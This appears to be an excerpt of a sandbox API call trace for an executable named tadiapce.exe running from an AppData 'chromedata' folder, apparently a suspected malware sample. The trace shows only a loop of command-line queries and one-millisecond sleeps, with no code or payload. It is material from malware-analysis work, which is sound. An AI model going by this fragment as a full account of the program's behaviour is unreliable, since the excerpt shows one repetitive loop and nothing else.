	[0088.031] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0c00*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.031] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.031] Sleep (dwMilliseconds=0x1) 
	[0088.078] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0c90*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.078] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.078] Sleep (dwMilliseconds=0x1) 
	[0088.125] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0d20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.125] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.125] Sleep (dwMilliseconds=0x1) 
	[0088.172] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x21ff60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.172] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.172] Sleep (dwMilliseconds=0x1) 
	[0088.219] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x21fff0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.219] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.219] Sleep (dwMilliseconds=0x1) 
	[0088.265] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220080*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.265] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.265] Sleep (dwMilliseconds=0x1) 
	[0088.312] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220110*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.312] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.312] Sleep (dwMilliseconds=0x1) 
	[0088.359] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2201a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.359] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.359] Sleep (dwMilliseconds=0x1) 
	[0088.406] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220230*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.406] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.406] Sleep (dwMilliseconds=0x1) 
	[0088.453] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2202c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.453] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.454] Sleep (dwMilliseconds=0x1) 
	[0088.500] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220350*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.500] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.500] Sleep (dwMilliseconds=0x1) 
	[0088.546] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2203e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.546] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.546] Sleep (dwMilliseconds=0x1) 
	[0088.593] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220470*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.593] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.593] Sleep (dwMilliseconds=0x1) 
	[0088.628] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220500*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.628] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.628] Sleep (dwMilliseconds=0x1) 
	[0088.671] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220590*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.671] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.671] Sleep (dwMilliseconds=0x1) 
	[0088.718] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220620*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.718] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.718] Sleep (dwMilliseconds=0x1) 
	[0088.760] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2206b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.760] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.760] Sleep (dwMilliseconds=0x1) 
	[0088.796] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220740*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.796] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.796] Sleep (dwMilliseconds=0x1) 
	[0088.829] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2207d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.829] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.829] Sleep (dwMilliseconds=0x1) 
	[0088.874] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220860*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.874] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.874] Sleep (dwMilliseconds=0x1) 
	[0088.921] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2208f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.921] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.921] Sleep (dwMilliseconds=0x1) 
	[0088.967] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220980*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0088.967] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0088.967] Sleep (dwMilliseconds=0x1) 
	[0089.014] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220a10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.014] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.014] Sleep (dwMilliseconds=0x1) 
	[0089.061] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220aa0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.061] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.061] Sleep (dwMilliseconds=0x1) 
	[0089.108] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220b30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.108] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.108] Sleep (dwMilliseconds=0x1) 
	[0089.154] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220bc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.155] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.155] Sleep (dwMilliseconds=0x1) 
	[0089.202] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220c50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.202] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.202] Sleep (dwMilliseconds=0x1) 
	[0089.247] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220ce0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.247] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.247] Sleep (dwMilliseconds=0x1) 
	[0089.294] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220d70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.294] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.294] Sleep (dwMilliseconds=0x1) 
	[0089.326] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220e00*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.326] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.326] Sleep (dwMilliseconds=0x1) 
	[0089.373] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220e90*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.373] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.373] Sleep (dwMilliseconds=0x1) 
	[0089.420] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220f20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.420] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.420] Sleep (dwMilliseconds=0x1) 
	[0089.467] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x220fb0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.467] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.467] Sleep (dwMilliseconds=0x1) 
	[0089.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221040*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.514] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.514] Sleep (dwMilliseconds=0x1) 
	[0089.547] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2210d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.547] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.547] Sleep (dwMilliseconds=0x1) 
	[0089.591] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221160*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.591] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.591] Sleep (dwMilliseconds=0x1) 
	[0089.629] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2211f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.629] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.629] Sleep (dwMilliseconds=0x1) 
	[0089.669] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221280*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.669] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.669] Sleep (dwMilliseconds=0x1) 
	[0089.702] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221310*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.702] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.702] Sleep (dwMilliseconds=0x1) 
	[0089.734] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2213a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.734] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.734] Sleep (dwMilliseconds=0x1) 
	[0089.778] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221430*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.779] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.779] Sleep (dwMilliseconds=0x1) 
	[0089.826] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2214c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.826] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.826] Sleep (dwMilliseconds=0x1) 
	[0089.872] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221550*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.872] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.872] Sleep (dwMilliseconds=0x1) 
	[0089.919] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2215e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.919] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.919] Sleep (dwMilliseconds=0x1) 
	[0089.966] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221670*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0089.966] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0089.966] Sleep (dwMilliseconds=0x1) 
	[0090.013] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221700*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.013] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.013] Sleep (dwMilliseconds=0x1) 
	[0090.059] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221790*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.059] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.060] Sleep (dwMilliseconds=0x1) 
	[0090.106] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221820*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.106] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.106] Sleep (dwMilliseconds=0x1) 
	[0090.153] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2218b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.153] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.153] Sleep (dwMilliseconds=0x1) 
	[0090.200] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221940*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.200] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.200] Sleep (dwMilliseconds=0x1) 
	[0090.246] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2219d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.246] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.246] Sleep (dwMilliseconds=0x1) 
	[0090.293] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221a60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.293] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.293] Sleep (dwMilliseconds=0x1) 
	[0090.336] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221af0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.336] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.336] Sleep (dwMilliseconds=0x1) 
	[0090.378] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221b80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.378] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.378] Sleep (dwMilliseconds=0x1) 
	[0090.416] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221c10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.416] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.416] Sleep (dwMilliseconds=0x1) 
	[0090.453] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221ca0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.453] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.453] Sleep (dwMilliseconds=0x1) 
	[0090.493] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221d30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.493] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.493] Sleep (dwMilliseconds=0x1) 
	[0090.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221dc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.532] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.532] Sleep (dwMilliseconds=0x1) 
	[0090.567] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221e50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
